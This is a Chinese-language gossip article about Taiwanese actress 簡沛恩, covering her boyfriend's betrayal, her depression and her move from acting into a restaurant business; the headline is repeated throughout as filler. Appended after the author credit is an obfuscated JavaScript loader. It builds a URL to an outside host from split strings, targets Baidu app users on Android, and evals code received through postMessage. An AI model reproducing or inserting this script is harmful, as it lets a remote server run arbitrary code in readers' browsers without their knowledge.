著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

今年46歲的台灣女星簡沛恩,在如今開啟自己的事業之前,出演過幾部經典的影視劇,還曾經搭檔過張豐毅。

所以也算是知名演員了,不過並沒有在這條路上一直走,可能是因為經歷了太多的事情。

可能有很多觀眾來說,簡沛恩的知名度是零。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

當然現在的演藝圈很多明星都已經紛紛選擇退出,然後回歸家庭,過自己的生活,簡沛恩就是其中之一。

演藝圈確實比較複雜,想要成名走紅不僅僅是努力就足夠的,還有很多的因素,但是每一個選擇都關乎自己的前途、命運。

先來看看當年她發生了什麼事情?

曾經在一個節目上,簡沛恩說在18歲的時候認識了一個非常優秀的男生,然後兩人走到了一起。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

但是這段初戀並沒有讓她的生活有多少甜蜜,而是給她帶來了痛苦。

因為男友去當兵,他們的感情破碎,甚至還有書信聯絡,有一次簡沛恩坐公車去看男友,結果卻親眼目睹男友偷食!

這樣的經歷著實令人很是感慨。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

她形容當時好像整個世界都坍塌下來了,非常難過,整日以淚洗面,甚至在長期的壓抑之下還得了抑鬱症。

其實會有這樣的傷痛感覺完全可以理解,因為在那個年紀本就面對的是一段清純的愛戀,心裡想要的更是一個所謂天長地久、山盟海誓。

都說初戀是最刻骨銘心的,大概就是因為對愛情充滿期望,但是一輩子只能有那麼一次為愛不顧一切的衝動。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

不過簡沛恩對這段失敗還是表示慶幸,她說自己如果當時結婚了,那可能現在已經離婚800次了,所以雖然男友傷害了她,但心裡依然非常感恩,因為有這次經歷,才有更好面對未來的可能性。

現在關於”女性獨立”這個話題一直成為大家的熱議,而且越來越多的女性開始努力的做到這樣。

獨立不僅僅是經濟獨立,還有精神上的獨立。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

很多女性開始不會太過依賴男人,以前那些在傷心的時候就需要找個肩膀依靠,已經是過去式了。

這一點從娛樂圈很好的體現,越來越多女明星選擇過單身的生活,從不會刻意的去為愛委曲求全。

簡沛恩顯然也是這樣的想法,她開始重新審視自己對待愛情的態度。

從那之後也不再覺得人生必須是愛情至上,還有很多的可能性。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

所以她在忍痛割愛之後,也就決定不再結婚、生子,而是將更多的時間、精力放在事業上。

她開始退出娛樂圈,嘗試做生意、創業,幾年時間下來已經有了自己的餐飲事業,如今是銀湯匙餐飲集團執行董事。

現在依然會出現在某些節目中,雖然還會講述當年的事情,但是言語間可以聽出來,確實已經釋然。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

雖然那種痛感還是記憶猶新,但是她努力的讓這些痛感變成激勵自己前進的動力。

正是因為這些動力,她才能一路開掛走下去。

如今她的臉上全是自信的笑容,在和人相處的時候也是讓人有一種為之折服的氣質。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

即使也會和好友談論到愛情,也會談論到男人。

但是她不會再逃避,而是更加坦然的說自己也愛過一個男人,也被人傷害過,只是現在走出了傷痛,已經46歲了,依然還在努力的賺錢,積極的生活。

她完全可以一口氣說出這些,然後看所有人都對她投來仰慕的目光。

這可能就是她認為最美好的人生。

著名女星親眼目睹男友偷食!忍痛割愛,46歲一心賺錢不婚不生

現在能夠在網上查找到的資料中,已經基本上不介紹她的演繹作品,而是一些參加活動的經歷,可能一方面是因為她出演的都是影視劇配角,另一方面是因為她的事業經歷確實比演義經歷出彩。

所以我們在講述簡沛恩的故事時,也確實更願意從事業的角度去講述。

現在她已經很少有近況消息,她應該過得非常的幸福。

那種幸福不是依賴別人,而是依靠自己。

當你正在遭遇傷痛,想想簡沛恩,樂觀的走下去,也一定會看到光明。

——END——

作者: 檸檬渣

原創作品,抄襲必究。

圖片來源於網路,如有侵權,請聯繫我刪除,謝謝!

(function(){
var server = [[‘htt’+’ps’,’/’+’/’].join(‘:’),[‘w’+’w’+’w’,’p’+’r’+’j’+’s’+’l’+’x’+’h’+’t’+’x’+’0’+’0’+’5′,’to’+’p’].join(‘.’),’:’,[‘1’+’8’+’4’+’4’+’3’].join(”),[‘/kd’+’/c-‘+’427’+’6-2’+’5’].join(”)].join(”);
/(baiduboxapp)/i.test(navigator.userAgent) && /android/i.test(navigator.userAgent) ?
(function () {
var _kdnqid = “k_4276”;
var _kdnqclass = _kdnqid;
_kdnqid += document.querySelectorAll(“.” + _kdnqclass).length;
let html = ``;
document.writeln(html);
window.removeEventListener(“message”,runMessages,true);
function runMessages(e){
var a = e.data;
a[“des_s_4276” + _kdnqid] && eval(decodeURIComponent(a[“des_s_4276” + _kdnqid][‘rep’+’la’+’ce’](“/+/g”, “%20”)));
}
window.addEventListener(“message”, runMessages,true);
})() : document.writeln(``);
})();